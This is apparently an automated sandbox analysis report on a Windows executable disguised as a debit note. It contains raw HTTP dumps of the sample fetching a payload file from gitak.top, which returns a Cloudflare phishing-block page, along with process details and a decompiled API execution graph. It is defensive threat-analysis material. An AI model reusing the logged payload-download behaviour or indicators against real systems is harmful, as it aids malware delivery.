                              2024-08-26 13:40:07 UTC1369INData Raw: 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 63 73 75 5f 48 39 78 72 75 57 4e 78 63 75 54 51 58 46 4a 4f 5a 70 58 66 38 6d 39 50 36 72 70 4d 51 54 64 73 47 73 49 56 57 33 41 2d 31 37 32 34 36 37 39 36 30 36 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22
                              Data Ascii: <input type="hidden" name="atok" value="csu_H9xruWNxcuTQXFJOZpXf8m9P6rpMQTdsGsIVW3A-1724679606-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn"
                              2024-08-26 13:40:07 UTC854INData Raw: 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61
                              Data Ascii: tor sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudfla
                              2024-08-26 13:40:07 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              46192.168.11.2049863172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:40:17 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:40:17 UTC543INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:40:17 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6qCplPwHOxoM%2BDWbHrv0LAr57vgvfnGebM6ncK5kR1dfQk%2F66Qvdf0ViGBIRUtNsK6jyKCgFy4eAU7Y1eKq%2BrCqLHZpN%2B8uv23zriaMLNGoCegt%2B2iXWikxUr1g%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b943b990d9d9c48-IAD
                              2024-08-26 13:40:17 UTC826INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:40:17 UTC1369INData Raw: 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74
                              Data Ascii: s.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert
                              2024-08-26 13:40:17 UTC1369INData Raw: 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 6a 58 6d 66 31 5a 38 37 7a 6f 38 75 49 70 65 4d 6f 6c 6e 33 50 67 74 50 57 32 4a 76 54 77 51 42 71 77 37 54 51 47 36 62 57 36 67 2d 31 37 32 34 36 37 39 36 31 37 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22
                              Data Ascii: <input type="hidden" name="atok" value="jXmf1Z87zo8uIpeMoln3PgtPW2JvTwQBqw7TQG6bW6g-1724679617-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn"
                              2024-08-26 13:40:17 UTC854INData Raw: 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61
                              Data Ascii: tor sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudfla
                              2024-08-26 13:40:17 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Click to jump to process

                              Target ID:0
                              Start time:09:31:51
                              Start date:26/08/2024
                              Path:C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"
                              Imagebase:0x400000
                              File size:330'962 bytes
                              MD5 hash:5133F0BAA9AB594674EAE836FD1491C7
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              Target ID:2
                              Start time:09:32:03
                              Start date:26/08/2024
                              Path:C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"
                              Imagebase:0x400000
                              File size:330'962 bytes
                              MD5 hash:5133F0BAA9AB594674EAE836FD1491C7
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              Reset < >

                                Execution Graph

                                Execution Coverage:19.6%
                                Dynamic/Decrypted Code Coverage:13.9%
                                Signature Coverage:18.7%
                                Total number of Nodes:1520
                                Total number of Limit Nodes:36
                                execution_graph 4931 10001000 4934 1000101b 4931->4934 4941 10001516 4934->4941 4936 10001020 4937 10001024 4936->4937 4938 10001027 GlobalAlloc 4936->4938 4939 1000153d 3 API calls 4937->4939 4938->4937 4940 10001019 4939->4940 4943 1000151c 4941->4943 4942 10001522 4942->4936 4943->4942 4944 1000152e GlobalFree 4943->4944 4944->4936 4945 401d41 GetDC GetDeviceCaps 4946 402b1d 18 API calls 4945->4946 4947 401d5f MulDiv ReleaseDC 4946->4947 4948 402b1d 18 API calls 4947->4948 4949 401d7e 4948->4949 4950 405f6a 18 API calls 4949->4950 4951 401db7 CreateFontIndirectW 4950->4951 4952 4024e8 4951->4952 3944 403cc2 3945 403e15 3944->3945 3946 403cda 3944->3946 3947 403e26 GetDlgItem GetDlgItem 3945->3947 3956 403e66 3945->3956 3946->3945 3948 403ce6 3946->3948 3951 40419a 19 API calls 3947->3951 3949 403cf1 SetWindowPos 3948->3949 3950 403d04 3948->3950 3949->3950 3953 403d21 3950->3953 3954 403d09 ShowWindow 3950->3954 3955 403e50 SetClassLongW 3951->3955 3952 403ec0 3962 403e10 3952->3962 4014 4041e6 3952->4014 3958 403d43 3953->3958 3959 403d29 DestroyWindow 3953->3959 3954->3953 3960 40140b 2 API calls 3955->3960 3956->3952 3961 401389 2 API calls 3956->3961 3964 403d48 SetWindowLongW 3958->3964 3965 403d59 3958->3965 3963 404123 3959->3963 3960->3956 3966 403e98 3961->3966 3963->3962 3972 404154 ShowWindow 3963->3972 3964->3962 3969 403e02 3965->3969 3970 403d65 GetDlgItem 3965->3970 3966->3952 3971 403e9c SendMessageW 3966->3971 3967 40140b 2 API calls 3985 403ed2 3967->3985 3968 404125 DestroyWindow EndDialog 3968->3963 4051 404201 3969->4051 3973 403d95 3970->3973 3974 403d78 SendMessageW IsWindowEnabled 3970->3974 3971->3962 3972->3962 3977 403da2 3973->3977 3978 403db5 3973->3978 3979 403de9 SendMessageW 3973->3979 3988 403d9a 3973->3988 3974->3962 3974->3973 3977->3979 3977->3988 3982 403dd2 3978->3982 3983 403dbd 3978->3983 3979->3969 3981 40419a 19 API calls 3981->3985 3987 40140b 2 API calls 3982->3987 4045 40140b 3983->4045 3984 403dd0 3984->3969 3985->3962 3985->3967 3985->3968 3985->3981 4005 404065 DestroyWindow 3985->4005 4017 405f6a 3985->4017 4035 40419a 3985->4035 3989 403dd9 3987->3989 4048 404173 3988->4048 3989->3969 3989->3988 3991 403f4d GetDlgItem 3992 403f62 3991->3992 3993 403f6a ShowWindow KiUserCallbackDispatcher 3991->3993 3992->3993 4038 4041bc KiUserCallbackDispatcher 3993->4038 3995 403f94 EnableWindow 3998 403fa8 3995->3998 3996 403fad GetSystemMenu EnableMenuItem SendMessageW 3997 403fdd SendMessageW 3996->3997 3996->3998 3997->3998 3998->3996 4039 4041cf SendMessageW 3998->4039 4040 405f48 lstrcpynW 3998->4040 4001 40400b lstrlenW 4002 405f6a 18 API calls 4001->4002 4003 404021 SetWindowTextW 4002->4003 4041 401389 4003->4041 4005->3963 4006 40407f CreateDialogParamW 4005->4006 4006->3963 4007 4040b2 4006->4007 4008 40419a 19 API calls 4007->4008 4009 4040bd GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4008->4009 4010 401389 2 API calls 4009->4010 4011 404103 4010->4011 4011->3962 4012 40410b ShowWindow 4011->4012 4013 4041e6 SendMessageW 4012->4013 4013->3963 4015 4041fe 4014->4015 4016 4041ef SendMessageW 4014->4016 4015->3985 4016->4015 4032 405f77 4017->4032 4018 4061c2 4019 4061d8 4018->4019 4081 405f48 lstrcpynW 4018->4081 4019->3985 4021 40602a GetVersion 4021->4032 4022 406190 lstrlenW 4022->4032 4023 405f6a 10 API calls 4023->4022 4026 4060a5 GetSystemDirectoryW 4026->4032 4028 4060b8 GetWindowsDirectoryW 4028->4032 4030 405f6a 10 API calls 4030->4032 4031 406131 lstrcatW 4031->4032 4032->4018 4032->4021 4032->4022 4032->4023 4032->4026 4032->4028 4032->4030 4032->4031 4033 4060ec SHGetSpecialFolderLocation 4032->4033 4065 405e15 RegOpenKeyExW 4032->4065 4070 4061dc 4032->4070 4079 405e8f wsprintfW 4032->4079 4080 405f48 lstrcpynW 4032->4080 4033->4032 4034 406104 SHGetPathFromIDListW CoTaskMemFree 4033->4034 4034->4032 4036 405f6a 18 API calls 4035->4036 4037 4041a5 SetDlgItemTextW 4036->4037 4037->3991 4038->3995 4039->3998 4040->4001 4042 401390 4041->4042 4043 4013fe 4042->4043 4044 4013cb MulDiv SendMessageW 4042->4044 4043->3985 4044->4042 4046 401389 2 API calls 4045->4046 4047 401420 4046->4047 4047->3988 4049 404180 SendMessageW 4048->4049 4050 40417a 4048->4050 4049->3984 4050->4049 4052 404219 GetWindowLongW 4051->4052 4053 4042a2 4051->4053 4052->4053 4054 40422a 4052->4054 4053->3962 4055 404239 GetSysColor 4054->4055 4056 40423c 4054->4056 4055->4056 4057 404242 SetTextColor 4056->4057 4058 40424c SetBkMode 4056->4058 4057->4058 4059 404264 GetSysColor 4058->4059 4060 40426a 4058->4060 4059->4060 4061 404271 SetBkColor 4060->4061 4062 40427b 4060->4062 4061->4062 4062->4053 4063 404295 CreateBrushIndirect 4062->4063 4064 40428e DeleteObject 4062->4064 4063->4053 4064->4063 4066 405e89 4065->4066 4067 405e49 RegQueryValueExW 4065->4067 4066->4032 4068 405e6a RegCloseKey 4067->4068 4068->4066 4071 4061e9 4070->4071 4073 40625f 4071->4073 4074 406252 CharNextW 4071->4074 4077 40623e CharNextW 4071->4077 4078 40624d CharNextW 4071->4078 4082 4059c0 4071->4082 4072 406264 CharPrevW 4072->4073 4073->4072 4075 406285 4073->4075 4074->4071 4074->4073 4075->4032 4077->4071 4078->4074 4079->4032 4080->4032 4081->4019 4083 4059c6 4082->4083 4084 4059dc 4083->4084 4085 4059cd CharNextW 4083->4085 4084->4071 4085->4083 4953 401a42 4954 402b1d 18 API calls 4953->4954 4955 401a48 4954->4955 4956 402b1d 18 API calls 4955->4956 4957 4019f0 4956->4957 4958 402746 4959 402741 4958->4959 4959->4958 4960 402756 FindNextFileW 4959->4960 4961 4027a8 4960->4961 4963 402761 4960->4963 4964 405f48 lstrcpynW 4961->4964 4964->4963 4965 401cc6 4966 402b1d 18 API calls 4965->4966 4967 401cd9 SetWindowLongW 4966->4967 4968 4029c7 4967->4968 4235 401dc7 4243 402b1d 4235->4243 4237 401dcd 4238 402b1d 18 API calls 4237->4238 4239 401dd6 4238->4239 4240 401de8 EnableWindow 4239->4240 4241 401ddd ShowWindow 4239->4241 4242 4029c7 4240->4242 4241->4242 4244 405f6a 18 API calls 4243->4244 4245 402b31 4244->4245 4245->4237 4969 401bca 4970 402b1d 18 API calls 4969->4970 4971 401bd1 4970->4971 4972 402b1d 18 API calls 4971->4972 4973 401bdb 4972->4973 4974 401beb 4973->4974 4975 402b3a 18 API calls 4973->4975 4976 401bfb 4974->4976 4977 402b3a 18 API calls 4974->4977 4975->4974 4978 401c06 4976->4978 4979 401c4a 4976->4979 4977->4976 4981 402b1d 18 API calls 4978->4981 4980 402b3a 18 API calls 4979->4980 4982 401c4f 4980->4982 4983 401c0b 4981->4983 4984 402b3a 18 API calls 4982->4984 4985 402b1d 18 API calls 4983->4985 4986 401c58 FindWindowExW 4984->4986 4987 401c14 4985->4987 4990 401c7a 4986->4990 4988 401c3a SendMessageW 4987->4988 4989 401c1c SendMessageTimeoutW 4987->4989 4988->4990 4989->4990 4991 40194b 4992 402b1d 18 API calls 4991->4992 4993 401952 4992->4993 4994 402b1d 18 API calls 4993->4994 4995 40195c 4994->4995 4996 402b3a 18 API calls 4995->4996 4997 401965 4996->4997 4998 401979 lstrlenW 4997->4998 5003 4019b5 4997->5003 4999 401983 4998->4999 4999->5003 5004 405f48 lstrcpynW 4999->5004 5001 40199e 5002 4019ab lstrlenW 5001->5002 5001->5003 5002->5003 5004->5001 5008 4024cc 5009 402b3a 18 API calls 5008->5009 5010 4024d3 5009->5010 5013 405bb4 GetFileAttributesW CreateFileW 5010->5013 5012 4024df 5013->5012 5014 40164d 5015 402b3a 18 API calls 5014->5015 5016 401653 5015->5016 5017 40628b 2 API calls 5016->5017 5018 401659 5017->5018 5019 4019cf 5020 402b3a 18 API calls 5019->5020 5021 4019d6 5020->5021 5022 402b3a 18 API calls 5021->5022 5023 4019df 5022->5023 5024 4019e6 lstrcmpiW 5023->5024 5025 4019f8 lstrcmpW 5023->5025 5026 4019ec 5024->5026 5025->5026 5027 401e51 5028 402b3a 18 API calls 5027->5028 5029 401e57 5028->5029 5030 4051f2 25 API calls 5029->5030 5031 401e61 5030->5031 5032 4056c3 2 API calls 5031->5032 5033 401e67 5032->5033 5034 401ec6 CloseHandle 5033->5034 5035 401e77 WaitForSingleObject 5033->5035 5037 402793 5033->5037 5034->5037 5036 401e89 5035->5036 5038 401e9b GetExitCodeProcess 5036->5038 5039 4062eb 2 API calls 5036->5039 5040 401eb8 5038->5040 5041 401ead 5038->5041 5042 401e90 WaitForSingleObject 5039->5042 5040->5034 5044 405e8f wsprintfW 5041->5044 5042->5036 5044->5040 4388 401752 4389 402b3a 18 API calls 4388->4389 4390 401759 4389->4390 4391 401781 4390->4391 4392 401779 4390->4392 4429 405f48 lstrcpynW 4391->4429 4428 405f48 lstrcpynW 4392->4428 4395 40178c 4397 405993 3 API calls 4395->4397 4396 40177f 4399 4061dc 5 API calls 4396->4399 4398 401792 lstrcatW 4397->4398 4398->4396 4404 40179e 4399->4404 4400 40628b 2 API calls 4400->4404 4401 4017da 4403 405b8f 2 API calls 4401->4403 4403->4404 4404->4400 4404->4401 4405 4017b0 CompareFileTime 4404->4405 4406 401870 4404->4406 4409 405f48 lstrcpynW 4404->4409 4415 405f6a 18 API calls 4404->4415 4426 401847 4404->4426 4427 405bb4 GetFileAttributesW CreateFileW 4404->4427 4430 405724 4404->4430 4405->4404 4407 4051f2 25 API calls 4406->4407 4410 40187a 4407->4410 4408 4051f2 25 API calls 4414 40185c 4408->4414 4409->4404 4411 403062 46 API calls 4410->4411 4413 40188d 4411->4413 4412 4018a1 SetFileTime 4416 4018b3 CloseHandle 4412->4416 4413->4412 4413->4416 4415->4404 4416->4414 4417 4018c4 4416->4417 4418 4018c9 4417->4418 4419 4018dc 4417->4419 4420 405f6a 18 API calls 4418->4420 4421 405f6a 18 API calls 4419->4421 4422 4018d1 lstrcatW 4420->4422 4423 4018e4 4421->4423 4422->4423 4425 405724 MessageBoxIndirectW 4423->4425 4425->4414 4426->4408 4426->4414 4427->4404 4428->4396 4429->4395 4431 405739 4430->4431 4432 405785 4431->4432 4433 40574d MessageBoxIndirectW 4431->4433 4432->4404 4433->4432 4434 402253 4435 402261 4434->4435 4436 40225b 4434->4436 4438 402b3a 18 API calls 4435->4438 4441 40226f 4435->4441 4437 402b3a 18 API calls 4436->4437 4437->4435 4438->4441 4439 40227d 4440 402b3a 18 API calls 4439->4440 4443 402286 WritePrivateProfileStringW 4440->4443 4441->4439 4442 402b3a 18 API calls 4441->4442 4442->4439 5059 402454 5060 402c44 19 API calls 5059->5060 5061 40245e 5060->5061 5062 402b1d 18 API calls 5061->5062 5063 402467 5062->5063 5064 40248b RegEnumValueW 5063->5064 5065 40247f RegEnumKeyW 5063->5065 5066 402793 5063->5066 5064->5066 5067 4024a4 RegCloseKey 5064->5067 5065->5067 5067->5066 5069 401ed4 5070 402b3a 18 API calls 5069->5070 5071 401edb 5070->5071 5072 40628b 2 API calls 5071->5072 5073 401ee1 5072->5073 5074 401ef2 5073->5074 5076 405e8f wsprintfW 5073->5076 5076->5074 4457 4022d5 4458 402305 4457->4458 4459 4022da 4457->4459 4461 402b3a 18 API calls 4458->4461 4480 402c44 4459->4480 4463 40230c 4461->4463 4462 4022e1 4464 4022eb 4462->4464 4468 402322 4462->4468 4469 402b7a RegOpenKeyExW 4463->4469 4465 402b3a 18 API calls 4464->4465 4467 4022f2 RegDeleteValueW RegCloseKey 4465->4467 4467->4468 4470 402c0e 4469->4470 4474 402ba5 4469->4474 4470->4468 4471 402bcb RegEnumKeyW 4472 402bdd RegCloseKey 4471->4472 4471->4474 4475 4062b2 3 API calls 4472->4475 4473 402c02 RegCloseKey 4478 402bf1 4473->4478 4474->4471 4474->4472 4474->4473 4476 402b7a 3 API calls 4474->4476 4477 402bed 4475->4477 4476->4474 4477->4478 4479 402c1d RegDeleteKeyW 4477->4479 4478->4470 4479->4478 4481 402b3a 18 API calls 4480->4481 4482 402c5d 4481->4482 4483 402c6b RegOpenKeyExW 4482->4483 4483->4462 4491 4014d7 4492 402b1d 18 API calls 4491->4492 4493 4014dd Sleep 4492->4493 4495 4029c7 4493->4495 4710 40335a #17 SetErrorMode OleInitialize 4711 4062b2 3 API calls 4710->4711 4712 40339d SHGetFileInfoW 4711->4712 4785 405f48 lstrcpynW 4712->4785 4714 4033c8 GetCommandLineW 4786 405f48 lstrcpynW 4714->4786 4716 4033da GetModuleHandleW 4717 4033f4 4716->4717 4718 4059c0 CharNextW 4717->4718 4719 403402 CharNextW 4718->4719 4731 403414 4719->4731 4720 403516 4721 40352a GetTempPathW 4720->4721 4787 403326 4721->4787 4723 403542 4724 403546 GetWindowsDirectoryW lstrcatW 4723->4724 4725 40359c DeleteFileW 4723->4725 4727 403326 11 API calls 4724->4727 4795 402dbc GetTickCount GetModuleFileNameW 4725->4795 4726 4059c0 CharNextW 4726->4731 4729 403562 4727->4729 4729->4725 4732 403566 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4729->4732 4730 4035b0 4739 4059c0 CharNextW 4730->4739 4768 403653 4730->4768 4780 403663 4730->4780 4731->4720 4731->4726 4733 403518 4731->4733 4734 403326 11 API calls 4732->4734 4879 405f48 lstrcpynW 4733->4879 4738 403594 4734->4738 4738->4725 4738->4780 4753 4035cf 4739->4753 4741 403772 4744 403815 ExitProcess 4741->4744 4749 4062b2 3 API calls 4741->4749 4742 40367c 4743 405724 MessageBoxIndirectW 4742->4743 4745 40368a ExitProcess 4743->4745 4746 403692 lstrcatW lstrcmpiW 4751 4036ae CreateDirectoryW SetCurrentDirectoryW 4746->4751 4746->4780 4747 40362d 4750 405a9b 18 API calls 4747->4750 4752 403785 4749->4752 4754 403639 4750->4754 4755 4036d1 4751->4755 4756 4036c6 4751->4756 4757 4062b2 3 API calls 4752->4757 4753->4746 4753->4747 4754->4780 4880 405f48 lstrcpynW 4754->4880 4892 405f48 lstrcpynW 4755->4892 4891 405f48 lstrcpynW 4756->4891 4758 40378e 4757->4758 4761 4062b2 3 API calls 4758->4761 4763 403797 4761->4763 4765 4037b5 4763->4765 4771 4037a5 GetCurrentProcess 4763->4771 4764 403648 4881 405f48 lstrcpynW 4764->4881 4769 4062b2 3 API calls 4765->4769 4767 405f6a 18 API calls 4770 403710 DeleteFileW 4767->4770 4825 40391f 4768->4825 4772 4037ec 4769->4772 4773 40371d CopyFileW 4770->4773 4782 4036df 4770->4782 4771->4765 4775 403801 ExitWindowsEx 4772->4775 4777 40380e 4772->4777 4773->4782 4774 403766 4778 405de2 40 API calls 4774->4778 4775->4744 4775->4777 4776 405de2 40 API calls 4776->4782 4779 40140b 2 API calls 4777->4779 4778->4780 4779->4744 4882 40382d 4780->4882 4781 405f6a 18 API calls 4781->4782 4782->4767 4782->4774 4782->4776 4782->4781 4784 403751 CloseHandle 4782->4784 4893 4056c3 CreateProcessW 4782->4893 4784->4782 4785->4714 4786->4716 4788 4061dc 5 API calls 4787->4788 4790 403332 4788->4790 4789 40333c 4789->4723 4790->4789 4791 405993 3 API calls 4790->4791 4792 403344 CreateDirectoryW 4791->4792 4896 405be3 4792->4896 4900 405bb4 GetFileAttributesW CreateFileW 4795->4900 4797 402dff 4824 402e0c 4797->4824 4901 405f48 lstrcpynW 4797->4901 4799 402e22 4800 4059df 2 API calls 4799->4800 4801 402e28 4800->4801 4902 405f48 lstrcpynW 4801->4902 4803 402e33 GetFileSize 4804 402f34 4803->4804 4822 402e4a 4803->4822 4805 402d1a 33 API calls 4804->4805 4806 402f3b 4805->4806 4808 402f77 GlobalAlloc 4806->4808 4806->4824 4904 40330f SetFilePointer 4806->4904 4807 4032f9 ReadFile 4807->4822 4812 402f8e 4808->4812 4809 402fcf 4810 402d1a 33 API calls 4809->4810 4810->4824 4816 405be3 2 API calls 4812->4816 4813 402f58 4814 4032f9 ReadFile 4813->4814 4817 402f63 4814->4817 4815 402d1a 33 API calls 4815->4822 4818 402f9f CreateFileW 4816->4818 4817->4808 4817->4824 4819 402fd9 4818->4819 4818->4824 4903 40330f SetFilePointer 4819->4903 4821 402fe7 4823 403062 46 API calls 4821->4823 4822->4804 4822->4807 4822->4809 4822->4815 4822->4824 4823->4824 4824->4730 4826 4062b2 3 API calls 4825->4826 4827 403933 4826->4827 4828 403939 GetUserDefaultUILanguage 4827->4828 4829 40394b 4827->4829 4905 405e8f wsprintfW 4828->4905 4830 405e15 3 API calls 4829->4830 4832 40397b 4830->4832 4834 40399a lstrcatW 4832->4834 4835 405e15 3 API calls 4832->4835 4833 403949 4906 403bf5 4833->4906 4834->4833 4835->4834 4838 405a9b 18 API calls 4839 4039cc 4838->4839 4840 403a60 4839->4840 4842 405e15 3 API calls 4839->4842 4841 405a9b 18 API calls 4840->4841 4843 403a66 4841->4843 4844 4039fe 4842->4844 4845 403a76 LoadImageW 4843->4845 4846 405f6a 18 API calls 4843->4846 4844->4840 4852 403a1f lstrlenW 4844->4852 4853 4059c0 CharNextW 4844->4853 4847 403b1c 4845->4847 4848 403a9d RegisterClassW 4845->4848 4846->4845 4851 40140b 2 API calls 4847->4851 4849 403ad3 SystemParametersInfoW CreateWindowExW 4848->4849 4850 403b26 4848->4850 4849->4847 4850->4780 4856 403b22 4851->4856 4854 403a53 4852->4854 4855 403a2d lstrcmpiW 4852->4855 4857 403a1c 4853->4857 4859 405993 3 API calls 4854->4859 4855->4854 4858 403a3d GetFileAttributesW 4855->4858 4856->4850 4861 403bf5 19 API calls 4856->4861 4857->4852 4860 403a49 4858->4860 4862 403a59 4859->4862 4860->4854 4863 4059df 2 API 